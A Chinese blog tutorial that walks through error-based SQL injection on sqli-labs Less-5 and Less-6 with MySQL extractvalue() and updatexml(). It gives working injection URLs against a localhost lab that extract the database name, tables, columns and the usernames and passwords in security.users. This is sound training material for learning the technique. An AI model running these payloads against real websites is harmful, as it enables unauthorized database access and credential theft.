【Less-5/6】报错注入

最新推荐文章于 2024-08-06 10:48:37 发布
最新推荐文章于 2024-08-06 10:48:37 发布
阅读量435 收藏 3
点赞数
分类专栏: SQL注入总结 文章标签: mysql 数据库 SQL注入 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/109314974
版权

目录

一、报错注入知识铺垫

报错注入:extractvalue、updatexml报错原理

在mysql高版本(大于5.1版本)中添加了对XML文档进行查询和修改的函数:

  • ExtractValue() 使用XPath表示法从XML字符串中提取值
  • UpdateXML() 返回替换的XML片段

当这两个函数在执行时,如果出现xml文档路径错误就会产生报错。

1、extractvalue函数
  • 语法:ExtractValue(xml_frag, xpath_expr)
  • 接受两个字符串参数,一个XML标记片段 xml_frag和一个XPath表达式 xpath_expr(也称为 定位器); 它返回CDATA第一个文本节点的text(),该节点是XPath表达式匹配的元素的子元素。
  • extractvalue使用时当xpath_expr格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)
  • 第一个参数可以传入目标xml文档,第二个参数是用Xpath路径法表示的查找路径

例如:SELECT ExtractValue('<a><b><b/></a>', '/a/b');就是寻找前一段xml文档内容中的a节点下的b节点,这里如果Xpath格式语法书写错误的话,就会报错。这里就是利用这个特性来获得我们想要知道的内容。

在这里插入图片描述

  • http://localhost/sqli-labs/Less-5?id=1' and extractvalue(1,concat(0x7e,(select user()),0x7e)) -- +
  • 由于0x7e就是~不属于xpath语法格式,因此报出xpath语法错误。
  • 该语句对输出的字符长度也做了限制,其最长输出32位

在这里插入图片描述

2、updatexml函数
  • 语法:UpdateXML(xml_target, xpath_expr, new_xml)
  • xml_target:: 需要操作的xml片段
  • xpath_expr: 需要更新的xml路径(Xpath格式)
  • new_xml: 更新后的内容
  • updatexml使用时,当xpath_expr格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)

此函数用来更新选定XML片段的内容,将XML标记的给定片段的单个部分替换为 xml_target 新的XML片段 new_xml ,然后返回更改的XML。xml_target替换的部分 与xpath_expr 用户提供的XPath表达式匹配。

如果未xpath_expr找到表达式匹配 ,或者找到多个匹配项,则该函数返回原始 xml_targetXML片段。所有三个参数都应该是字符串。

  • http://localhost/sqli-labs/Less-5?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),3) -- +
  • 由于0x7e是~,不属于xpath语法格式,因此报出xpath语法错误。
  • 同样该语句对输出的字符长度也做了限制,其最长输出32位

在这里插入图片描述

二、报错注入复现
1、判断注入点
http://localhost/sqli-labs/Less-5?id=1

在这里插入图片描述

http://localhost/sqli-labs/Less-5?id=1'

在这里插入图片描述

http://localhost/sqli-labs/Less-5?id=1' and 1=1 -- +   // 字符型注入

在这里插入图片描述

http://localhost/sqli-labs/Less-5?id=1' and 1=2 -- +

在这里插入图片描述

http://localhost/sqli-labs/Less-5?id=-1

在这里插入图片描述
综合以上操作可以得出结论:

  • 页面无回显,不会显示我们的查询结果。
  • 查询语句正确时页面会打印You are in...........,错误则不显示。

可以通过布尔盲注来判断我们想要的信息,参考文章:https://www.cnblogs.com/Xy–1/p/12726288.html

这里我们用报错的注入方式。

2、报错查询

查询数据库及相关信息

http://localhost/sqli-labs/Less-5?id=1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1) -- +

在这里插入图片描述
查询当前数据库的所有表

http://localhost/sqli-labs/Less-5?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- +

在这里插入图片描述
查询users表字段信息

http://localhost/sqli-labs/Less-5?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) -- +

在这里插入图片描述
查询用户和用户密码

http://localhost/sqli-labs/Less-5?id=1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(" ",username,password)) from security.users),0x7e),1) -- +

在这里插入图片描述
该语句对输出的字符长度也做了限制,其最长输出32位。上图显示的用户信息长度为32位。

第六关和第五关相同,单引号变双引号!

在这里插入图片描述

三、总结

本关sql注入可以实现的三种方式:

布尔盲注:

  • 没有WAF
  • 对请求次数没有限制

报错注入

  • sql版本大于5.1
  • 输出的字符长度也做了限制,其最长输出32位

DNSLog注入

参考文章:

https://developer.aliyun.com/article/692723

多学点技术
关注
专栏目录
【Sqli-Labs-Master】Less-5 (报错注入
Oavinci的博客
06-08 1219
Less5 单引号的注入 ?id=1' 报错 ?id=1'%23 尝试闭合,成功回显 看到这个报错信息,基本就行布尔型盲注、报错型注入、时间延迟型盲注,UNION联合查询型注入应该是不能用了。 查看源代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql)...
报错注入学习及利用报错注入Less-5
willow_liang的博客
10-29 652
二次查询注入 #需要用到的sql函数学习 (1)count():返回某列的行数 count(*):返回某列的所有行数 (2)rand():随机输出一个小于1的正数 (3)floor():输出的结果取整 (4)group by语句:结果分组 (5)concat():连接两条语句 二次查询实质就是在select语句中嵌套一个select语句,其中嵌套的语句称为子查询。 (1)select concat((select database())); (2)select concat((select data
extractvalue报错注入
bangyan3903的博客
08-18 3552
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
sql注入复现(1-14关)
weixin_65785894的博客
08-06 1127
判断注入是否存在判断sql语句是否拼接可以根据结果指定是字符型且存在。因为该页面存在回显,所以我们可以使用联合查询。联合注入爆列首先知道表格有几列,如果报错就是超出列数,显示正常则是没有超出列数(使用二分法,先查看一个大的数值,显示正常,则翻倍,报错则缩小一半数值)爆显示位由于我们已经知道了这个表有三列,所以我们使用联合查询来爆出显示位由于只能查看一组数据,所以我们需要修改id值,让他要么远超这个数据表,要么小于0爆数据库名和版本号。
【sqli-labs】Less 5——报错注入(updatexml()函数)
用博客做做记录的小白
06-23 2250
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入,注入类型为单引号字符型。
SQLi LABS Less-5 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-26 1万+
sqlilabs 第五关,sqli-labes less-5,sqlilabs less5
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4248
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
SQL练习(less-6)字符型&报错注入
AmyBaby00的博客
08-28 558
127.0.0.1/sqli/Less-6/?id=1 利用报错信息, 固定格式: Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 Id=1’ union select Updatexml(1,concat(0×7e,b) union select updatexml(1,concat(0...
sql注入及sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 597
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
sqli-labs:less-5(单引号报错注入
羽的博客
07-13 265
?id=1 ?id=2 ?id=3 这时只回显这个界面 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...
sqli靶场——【Less-5】报错注入
weixin_63082823的博客
09-14 552
Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a; 以上语句可以简化成如下的形式: select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
渗透测试——报错注入
zjdda的博客
05-20 896
1.报错注入原理 由于后台没有对数据库的信息做过滤,会输出到前台显示,那么我们就可以通过制造报错函数,将查询语句带入到数据库中,以报错信息显示出来。 2.报错注入漏洞产生的条件 1)参数用户可控:前端传入的参数内容由用户控制 2)参数带入数据库的查询:传入的参数拼接到 SQL 语句,并且带入数据库的查询 3)对用户输入的数据没有做合法性的判断 4)后台对数据库的信息没做过滤,会输出到前台显示 3.常用哪些函数来制造爆错? extractvalue\updatexml\floor\exp 4.updatex
sqli-labs less-1(报错注入之extractvalue)
不知名白帽的博客
07-16 493
sqli-labs less-1(报错注入之extractvalue)
sqil-labs LESS5报错注入通关教程
m0_70787202的博客
03-19 192
less5 报错注入
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 2980
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。
sqli-labs-less-17 extractvalue报错注入
yzcn
11-13 299
Less-17 extractvalue报错注入 找寻注入点: 首先用burp suite抓包,得到post信息后,用hackbar进行测试 经过测试发现,无论怎样对uname进行测试,都显示失败,猜测是对uname进行了过滤,我们考虑从password进行注入: 该关卡是对密码进行更改,如果用户名正确,则修改密码为新密码,如果用户名错误,则返回失败, 因此该关卡需先知道一个用户名admin Sql知识: extractvalue(xml_frag,xpath_expr)使用xpath表示法从xml字符串中
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1125
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
小白报错注入学习(以extractvalue函数报错为例)
qq_35075142的博客
04-18 303
XPath_string (Xpath格式的字符串):XPath_string (Xpath格式的字符串):Xpath_string是xpath格式的字符串。:Xpath_string是xpath格式的字符串。:String 格式,替换查找到的符合条件的数据。:String 格式,替换查找到的符合条件的数据。:String 格式,XML 文档对象的名称。:String 格式,XML 文档对象的名称。如果要等效为联合注入的格式的话,是这样子:1。:string格式,为xml文档对象的名称。
判断注入
qq_41232519的博客
07-23 547
当用or语句时,如果后面的语句为真,前面的条件就不看了,直接执行后面的1=1(真)条件,查询所有 当后面的语句为假时,就用前面的条件去查询
分别使用ex()报错和floor()报错注入完成less-5、
最新发布
09-07
在进行`EX()`或`FLOOR()`函数报错注入(less-5)时,我们需要找到一个情况,使得这些函数在接收到恶意输入时会产生错误。由于`EX()`函数通常是用来计算表达式的指数运算,而`FLOOR()`函数用于向下取整,它们通常不会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值